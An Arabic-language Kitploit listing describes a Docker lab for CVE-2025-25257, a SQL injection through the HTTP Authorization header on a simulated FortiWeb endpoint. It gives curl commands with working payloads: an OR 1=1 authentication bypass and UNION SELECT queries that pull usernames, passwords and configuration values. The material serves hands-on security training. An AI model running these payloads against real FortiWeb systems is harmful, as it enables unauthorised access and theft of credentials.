Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2025-25257 — مختبر Docker قابل لإعادة الإنتاج لـ CVE-2025-25257، يوضح تجاوز حقن SQL واستخراج البيانات عبر رأس تفويض HTTP على نقطة نهاية FortiWeb محاكاة. | Kitploit
أدوات/GitHubGitHub/lytianahkone-boop/cve-2025-25257
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليمأمن قواعد البياناتمختبرات وتدريب عملي
GitHublytianahkone-boop/cve-2025-25257

cve-2025-25257

مختبر Docker قابل لإعادة الإنتاج لـ CVE-2025-25257، يوضح تجاوز حقن SQL واستخراج البيانات عبر رأس تفويض HTTP على نقطة نهاية FortiWeb محاكاة.

عرض المستودع
2منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-25257 - بيئة التجربة

بنية التجربة (تحاكي البيئة المكونات القابلة للاستغلال في FortiWeb)

root@kitploit:~
نقطة النهاية القابلة للاستغلال: /api/system/fabric/config
ناقل الحقن: ترويسة HTTP: Authorization: Bearer
الآلية: تسلسل SQL مباشر (f-string بلغة Python)
المصادقة: لا شيء (تجاوز كامل)
قاعدة البيانات: SQLite (لأغراض العرض التوضيحي)

cve-2025-25257

├── Dockerfile
├── docker-compose.yml
├── requirements.txt
├── app.py
├── init_db.py
├── payload.txt
└── README.md

Dockerfile : خدمة http قابلة للاستغلال عمدًا / تعرّض واجهة برمجة تطبيقات قابلة للاستغلال بدون مصادقة

docker-compose.yml : ينسّق خدمة قابلة للاستغلال قابلة للتكرار / يعرّض واجهة API قابلة للهجوم عبر http / يعزل بيئة التجربة

requirements.txt : يضمن بيئة مستقرة وقابلة للتكرار

app.py : ينفّذ نقطة نهاية قبل المصادقة / يقبل مدخلات المستخدم عبر Authorization/ يسلسل هذا الإدخال في استعلام SQL / يتيح تجاوز المصادقة واستخراج البيانات

init_db.py : يهيّئ مجموعة بيانات قابلة للاستغلال / يتيح عرضًا توضيحيًا واضحًا لتجاوز المصادقة وتهريب البيانات

payload.txt يوفّر دليلًا أدنى ومضبوطًا وقابلًا للملاحظة على تنفيذ الأكواد

الخطوة 1 : بناء وتشغيل الحاوية

بناء صورة Docker

docker-compose build

تشغيل الحاوية

docker-compose up -d

التحقق من أن الحاوية نشطة

docker-compose ps

الاطلاع على السجلات

docker-compose logs -f

الخطوة 2 : التحقق من إمكانية الوصول إلى الخدمة

curl http://localhost:8080/api/system/status

الخطوة 3 : استغلال الثغرة

طلب غير خبيث

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer valid_token_001"

حقن استعلام SQL خبيث - تجاوز عبر OR 1=1

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' OR '1'='1"

استخراج البيانات عبر حقن UNION-SELECT

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' UNION SELECT id, username, password, role, email, NULL FROM users--"

تهريب البيانات الحساسة

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' UNION SELECT id, key, value, description, '2025-01-01',NULL FROM system_config--"

الخطوة 4 : التنظيف والإيقاف

إيقاف الحاوية

docker-compose down

حذف وحدات التخزين (volumes)

docker-compose down -v

حذف الصورة

docker rmi cve-2025-25257-lab-fortiweb-vulnerable:latest

تنزيل الأداة